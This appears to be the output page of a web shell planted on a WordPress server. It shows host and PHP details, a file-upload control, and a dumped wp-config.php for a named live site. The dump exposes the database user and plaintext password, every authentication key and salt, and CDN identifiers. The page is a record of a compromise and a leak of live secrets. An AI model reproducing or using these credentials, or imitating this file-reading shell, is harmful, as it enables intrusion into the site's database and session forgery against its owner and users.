WS_OK_7.4.33 HEX
HEX
Server: nginx/1.21.4
System: Linux v12674 6.8.0-85-generic #85-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 18 15:26:59 UTC 2025 x86_64
User: endtheignorance (1014)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
Upload Files
File: /storage/v12674/lcafreshheads/public_html/wp-config.php
<?php
define( 'WP_CACHE', true ); // Added by WP Rocket

/**
 * The base configuration for WordPress
 *
 * @package WordPress
 */

// ** Database settings ** //
define( 'DB_NAME', 'lcafreshheadsdb' );
define( 'DB_USER', 'lcafreshheadsdbuser' );
define( 'DB_PASSWORD', 'uWqJN4Hew1qVW0EcbR' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 * REPLACE THIS ENTIRE BLOCK with fresh output from:
 * https://api.wordpress.org/secret-key/1.1/salt/
 */
define( 'AUTH_KEY',          'LfP0|u!7.AGiDt._Ge@pYz%_Q-/6(p@>FbxNnar!wcKy4L2&lQuN&rR^%~cB4vk;' );
define( 'SECURE_AUTH_KEY',   '~- e&UeH<uL0AMXd:~*lUP_,q&ZNp|:c<(4[`%94lV^DxsEg^Y]{xUtb>{1T{8lj' );
define( 'LOGGED_IN_KEY',     '$$NC$KZlAu1XX1$&7TG<s7B4.S`gJ1q|]$$@5e)$B!H.u`uY:e{1AQxZ*=YR3{cJ' );
define( 'NONCE_KEY',         '?JJ=a!<Y0l8FSOm~-{I@!v(M6$YN.=FbhnOaVf@}y[eZHDT+F[0X]lU^ube{dkHO' );
define( 'AUTH_SALT',         '<|03$}UXZXLBUNpD[06qZ,+)`=(~P?S3*DV6,Yls0BG|N>ry6=qel(gZmj%b=ygp' );
define( 'SECURE_AUTH_SALT',  'kMVg-+|3KAbz-WiQ7d]K6uLb5|t=X!7p`w3}/5N*#]ce.i/p}0ofeR2N0H:+#^(T' );
define( 'LOGGED_IN_SALT',    'g9W/fJh<H%^3E.)w+4W,+a#dg+^|Sua-7aTZs4lA]iYGSZ@`8@ 3UUE|~cUnBqW-' );
define( 'NONCE_SALT',        'HK1+>OJmo8GxvuFxX6FcwabwEx&>keb/3c77|cf?OV+#nht4`I|N=c%6VH%-^++@' );
define( 'WP_CACHE_KEY_SALT', 'r{+HW]6{XO][9*E,F)FJIfIC/1xVw&L67d;^%0^)vF-r4}8QEm@av`1BW5q@1#t_' );
/**#@-*/

/**
 * WordPress database table prefix.
 */
$table_prefix = 'wp_';

/* Add any custom values between this line and the "stop editing" line. */

/* ---------- Debugging ---------- */
if ( ! defined( 'WP_DEBUG' ) ) {
	define( 'WP_DEBUG', false );
}
define( 'WP_DEBUG_DISPLAY', false );  // never print errors to visitors
define( 'WP_DEBUG_LOG', false );      // no debug.log written into wp-content
@ini_set( 'display_errors', 0 );

/* ---------- Performance / environment ---------- */
define( 'FS_METHOD', 'direct' );
define( 'WP_MEMORY_LIMIT', '256M' );
define( 'WP_ENVIRONMENT_TYPE', 'production' );

/* ---------- Host / CDN ---------- */
define( 'CDN_SITE_ID', 'CF0KH6On3nBTDupCxnO5vd088' );
define( 'SPEEDIEN_API_KEY', 'ROTATE_THIS_KEY' );
define( 'SPEEDIEN_SITE_ID', '0c7057a2b3c073be669f314e0e896250' );

/* ---------- Security hardening ---------- */

// Force HTTPS on all admin and login pages
define( 'FORCE_SSL_ADMIN', true );

// Kill the dashboard theme/plugin file editor (three-click backdoor)
define( 'DISALLOW_FILE_EDIT', true );

// Block admins from posting raw JS/iframes in content
define( 'DISALLOW_UNFILTERED_HTML', true );

// Auto-install core security releases
define( 'WP_AUTO_UPDATE_CORE', 'minor' );

// Lock the site URL so a DB compromise can't redirect your traffic
define( 'WP_HOME', 'https://freshheadsliceremoval.com' );
define( 'WP_SITEURL', 'https://freshheadsliceremoval.com' );

// Don't leak the WP version in the admin footer
define( 'WP_POST_REVISIONS', 10 );
define( 'EMPTY_TRASH_DAYS', 14 );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';